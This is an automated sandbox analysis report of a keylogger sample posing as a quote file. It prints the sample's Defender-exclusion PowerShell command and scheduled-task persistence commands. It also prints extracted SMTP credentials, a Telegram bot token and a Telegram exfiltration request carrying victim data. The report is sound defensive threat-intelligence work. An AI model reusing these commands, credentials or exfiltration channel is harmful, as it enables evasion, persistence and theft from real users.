Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quote_items1&2.bat.exe

Overview

General Information

Sample name:Quote_items1&2.bat.exe
Analysis ID:1618378
MD5:2517ead89576385d7e8cc52cedcbf957
SHA1:adc56954bd09a7d831413400fe7bc1bf91322036
SHA256:200243f2d5b7e6c508171215dd9a2399d59d871cc33a56df55a8b4a38d874bb2
Tags:batexeuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to detect virtual machines (SGDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Quote_items1&2.bat.exe (PID: 3704 cmdline: "C:\Users\user\Desktop\Quote_items1&2.bat.exe" MD5: 2517EAD89576385D7E8CC52CEDCBF957)
    • powershell.exe (PID: 4236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6068 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5564 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Quote_items1&2.bat.exe (PID: 3884 cmdline: C:\Users\user\Desktop\Quote_items1&2.bat.exe MD5: 2517EAD89576385D7E8CC52CEDCBF957)
  • wJFLKBSbTtvP.exe (PID: 7192 cmdline: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe MD5: 2517EAD89576385D7E8CC52CEDCBF957)
    • schtasks.exe (PID: 7304 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpFBBB.tmp" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wJFLKBSbTtvP.exe (PID: 7352 cmdline: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe MD5: 2517EAD89576385D7E8CC52CEDCBF957)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Bot Token": "7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k", "Chat id": "6851554211", "Email ID": "hakar@bteenerji.com", "Password": "123husnu", "Host": "mail.bteenerji.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Username": "hakar@bteenerji.com", "Password": "123husnu", "Host": "mail.bteenerji.com", "Port": "587", "Token": "7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k", "Chat_id": "6851554211", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d984:$a1: get_encryptedPassword
        • 0x2dcc1:$a2: get_encryptedUsername
        • 0x2d794:$a3: get_timePasswordChanged
        • 0x2d89d:$a4: get_passwordField
        • 0x2d99a:$a5: set_encryptedPassword
        • 0x2f052:$a7: get_logins
        • 0x2ef9e:$a10: KeyLoggerEventArgs
        • 0x2ec06:$a11: KeyLoggerEventArgsEventHandler
        0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          10.2.Quote_items1&2.bat.exe.140000000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            10.2.Quote_items1&2.bat.exe.140000000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              10.2.Quote_items1&2.bat.exe.140000000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                10.2.Quote_items1&2.bat.exe.140000000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2db84:$a1: get_encryptedPassword
                • 0x2dec1:$a2: get_encryptedUsername
                • 0x2d994:$a3: get_timePasswordChanged
                • 0x2da9d:$a4: get_passwordField
                • 0x2db9a:$a5: set_encryptedPassword
                • 0x2f252:$a7: get_logins
                • 0x2f19e:$a10: KeyLoggerEventArgs
                • 0x2ee06:$a11: KeyLoggerEventArgsEventHandler
                10.2.Quote_items1&2.bat.exe.140000000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3b999:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x3b03c:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x3b299:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3bc78:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 25 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_items1&2.bat.exe", ParentImage: C:\Users\user\Desktop\Quote_items1&2.bat.exe, ParentProcessId: 3704, ParentProcessName: Quote_items1&2.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", ProcessId: 4236, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_items1&2.bat.exe", ParentImage: C:\Users\user\Desktop\Quote_items1&2.bat.exe, ParentProcessId: 3704, ParentProcessName: Quote_items1&2.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", ProcessId: 4236, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpFBBB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpFBBB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe, ParentImage: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe, ParentProcessId: 7192, ParentProcessName: wJFLKBSbTtvP.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpFBBB.tmp", ProcessId: 7304, ProcessName: schtasks.exe
                Sigma detected: Suspicious Outbound SMTP Connections
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 78.135.65.4, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quote_items1&2.bat.exe, Initiated: true, ProcessId: 3884, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 64730
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_items1&2.bat.exe", ParentImage: C:\Users\user\Desktop\Quote_items1&2.bat.exe, ParentProcessId: 3704, ParentProcessName: Quote_items1&2.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp", ProcessId: 5564, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_items1&2.bat.exe", ParentImage: C:\Users\user\Desktop\Quote_items1&2.bat.exe, ParentProcessId: 3704, ParentProcessName: Quote_items1&2.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe", ProcessId: 4236, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_items1&2.bat.exe", ParentImage: C:\Users\user\Desktop\Quote_items1&2.bat.exe, ParentProcessId: 3704, ParentProcessName: Quote_items1&2.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp", ProcessId: 5564, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T20:25:34.845744+010020600481Malware Command and Control Activity Detected192.168.2.66477578.135.65.4587TCP
                2025-02-18T20:25:34.845744+010020600481Malware Command and Control Activity Detected192.168.2.66473078.135.65.4587TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T20:26:05.587638+010028033053Unknown Traffic192.168.2.649834104.21.16.1443TCP
                2025-02-18T20:26:07.041054+010028033053Unknown Traffic192.168.2.649843104.21.16.1443TCP
                2025-02-18T20:26:08.464493+010028033053Unknown Traffic192.168.2.649853104.21.16.1443TCP
                2025-02-18T20:26:09.754048+010028033053Unknown Traffic192.168.2.649863104.21.16.1443TCP
                2025-02-18T20:26:11.684842+010028033053Unknown Traffic192.168.2.649874104.21.16.1443TCP
                2025-02-18T20:26:14.721583+010028033053Unknown Traffic192.168.2.649896104.21.16.1443TCP
                2025-02-18T20:26:15.605415+010028033053Unknown Traffic192.168.2.649902104.21.16.1443TCP
                2025-02-18T20:26:16.854172+010028033053Unknown Traffic192.168.2.649911104.21.16.1443TCP
                2025-02-18T20:26:18.504092+010028033053Unknown Traffic192.168.2.649925104.21.16.1443TCP
                2025-02-18T20:26:20.593886+010028033053Unknown Traffic192.168.2.649939104.21.16.1443TCP
                2025-02-18T20:26:21.336279+010028033053Unknown Traffic192.168.2.649944104.21.16.1443TCP
                2025-02-18T20:26:22.211477+010028033053Unknown Traffic192.168.2.649951104.21.16.1443TCP
                2025-02-18T20:26:24.187457+010028033053Unknown Traffic192.168.2.664729104.21.16.1443TCP
                2025-02-18T20:26:25.008291+010028033053Unknown Traffic192.168.2.664736104.21.16.1443TCP
                2025-02-18T20:26:25.996979+010028033053Unknown Traffic192.168.2.664742104.21.16.1443TCP
                2025-02-18T20:26:27.867209+010028033053Unknown Traffic192.168.2.664752104.21.16.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T20:26:02.486137+010028032742Potentially Bad Traffic192.168.2.649791193.122.130.080TCP
                2025-02-18T20:26:05.033036+010028032742Potentially Bad Traffic192.168.2.649791193.122.130.080TCP
                2025-02-18T20:26:06.486148+010028032742Potentially Bad Traffic192.168.2.649791193.122.130.080TCP
                2025-02-18T20:26:07.829999+010028032742Potentially Bad Traffic192.168.2.649791193.122.130.080TCP
                2025-02-18T20:26:09.173654+010028032742Potentially Bad Traffic192.168.2.649791193.122.130.080TCP
                2025-02-18T20:26:11.095539+010028032742Potentially Bad Traffic192.168.2.649791193.122.130.080TCP
                2025-02-18T20:26:14.158051+010028032742Potentially Bad Traffic192.168.2.649791193.122.130.080TCP
                2025-02-18T20:26:15.033030+010028032742Potentially Bad Traffic192.168.2.649791193.122.130.080TCP
                2025-02-18T20:26:15.767461+010028032742Potentially Bad Traffic192.168.2.649880193.122.130.080TCP
                2025-02-18T20:26:16.283036+010028032742Potentially Bad Traffic192.168.2.649791193.122.130.080TCP
                2025-02-18T20:26:17.908019+010028032742Potentially Bad Traffic192.168.2.649880193.122.130.080TCP
                2025-02-18T20:26:20.033015+010028032742Potentially Bad Traffic192.168.2.649880193.122.130.080TCP
                2025-02-18T20:26:20.751929+010028032742Potentially Bad Traffic192.168.2.649880193.122.130.080TCP
                2025-02-18T20:26:21.486160+010028032742Potentially Bad Traffic192.168.2.649880193.122.130.080TCP
                2025-02-18T20:26:23.392453+010028032742Potentially Bad Traffic192.168.2.649880193.122.130.080TCP
                2025-02-18T20:26:24.408174+010028032742Potentially Bad Traffic192.168.2.649880193.122.130.080TCP
                2025-02-18T20:26:25.345549+010028032742Potentially Bad Traffic192.168.2.649880193.122.130.080TCP
                2025-02-18T20:26:27.220559+010028032742Potentially Bad Traffic192.168.2.649880193.122.130.080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T20:26:27.032091+010018100081Potentially Bad Traffic192.168.2.664747149.154.167.220443TCP
                2025-02-18T20:26:39.125845+010018100081Potentially Bad Traffic192.168.2.664776149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T20:26:17.765581+010018100071Potentially Bad Traffic192.168.2.649917149.154.167.220443TCP
                2025-02-18T20:26:28.829399+010018100071Potentially Bad Traffic192.168.2.664757149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://mail.bteenerji.comAvira URL Cloud: Label: malware
                Source: http://bteenerji.comAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Bot Token": "7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k", "Chat id": "6851554211", "Email ID": "hakar@bteenerji.com", "Password": "123husnu", "Host": "mail.bteenerji.com", "Port": "587"}
                Source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "hakar@bteenerji.com", "Password": "123husnu", "Host": "mail.bteenerji.com", "Port": "587", "Token": "7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k", "Chat_id": "6851554211", "Version": "4.4"}
                Source: Quote_items1&2.bat.exe.3884.10.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k/sendMessage"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeReversingLabs: Detection: 45%
                Multi AV Scanner detection for submitted file
                Source: Quote_items1&2.bat.exeVirustotal: Detection: 45%Perma Link
                Source: Quote_items1&2.bat.exeReversingLabs: Detection: 45%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Sample uses string decryption to hide its real strings
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpackString decryptor: hakar@bteenerji.com
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpackString decryptor: 123husnu
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpackString decryptor: mail.bteenerji.com
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpackString decryptor: albertchigemezu@yandex.com
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpackString decryptor: 587
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpackString decryptor: 7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpackString decryptor: 6851554211
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpackString decryptor:

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49815 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49909 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49917 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:64757 version: TLS 1.2
                Source: Quote_items1&2.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: Quote_items1&2.bat.exe, 00000000.00000002.2323496123.000000000125F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdbt source: Quote_items1&2.bat.exe, 00000000.00000002.2323496123.000000000125F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: uyCa.pdb% source: Quote_items1&2.bat.exe, 00000000.00000002.2333448655.000000001C83A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: uyCa.pdbSHA256: source: Quote_items1&2.bat.exe, wJFLKBSbTtvP.exe.0.dr
                Source: Binary string: .Forms.pdb source: Quote_items1&2.bat.exe, 00000000.00000002.2333448655.000000001C83A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: uyCa.pdb source: Quote_items1&2.bat.exe, wJFLKBSbTtvP.exe.0.dr
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 4x nop then dec eax0_2_00007FFD344E0E26
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 4x nop then jmp 00007FFD3450C120h10_2_00007FFD3450BD3D
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 4x nop then jmp 00007FFD345098D4h10_2_00007FFD345096C2
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 4x nop then jmp 00007FFD3450BB2Dh10_2_00007FFD3450B79D
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 4x nop then jmp 00007FFD34509519h10_2_00007FFD34508A65
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 4x nop then jmp 00007FFD3450C120h10_2_00007FFD3450C03C
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 4x nop then jmp 00007FFD34508432h10_2_00007FFD34508271
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 4x nop then jmp 00007FFD3450A380h10_2_00007FFD34509B09
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 4x nop then dec eax12_2_00007FFD34500E26
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 4x nop then jmp 00007FFD3451C120h15_2_00007FFD3451BD3D
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 4x nop then jmp 00007FFD345198D4h15_2_00007FFD345196C2
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 4x nop then jmp 00007FFD3451BB2Dh15_2_00007FFD3451B79D
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 4x nop then jmp 00007FFD34519519h15_2_00007FFD34518A65
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 4x nop then jmp 00007FFD3451C120h15_2_00007FFD3451C03C
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 4x nop then jmp 00007FFD34518432h15_2_00007FFD34518271
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 4x nop then jmp 00007FFD3451A380h15_2_00007FFD34519B09

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.6:64775 -> 78.135.65.4:587
                Source: Network trafficSuricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.6:64730 -> 78.135.65.4:587
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:64776 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:64757 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49917 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:64747 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficTCP traffic: 192.168.2.6:64730 -> 78.135.65.4:587
                Source: global trafficTCP traffic: 192.168.2.6:64719 -> 162.159.36.2:53
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:26:15%0D%0ACountry%20Name:%20United%20States%0D%0A[%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
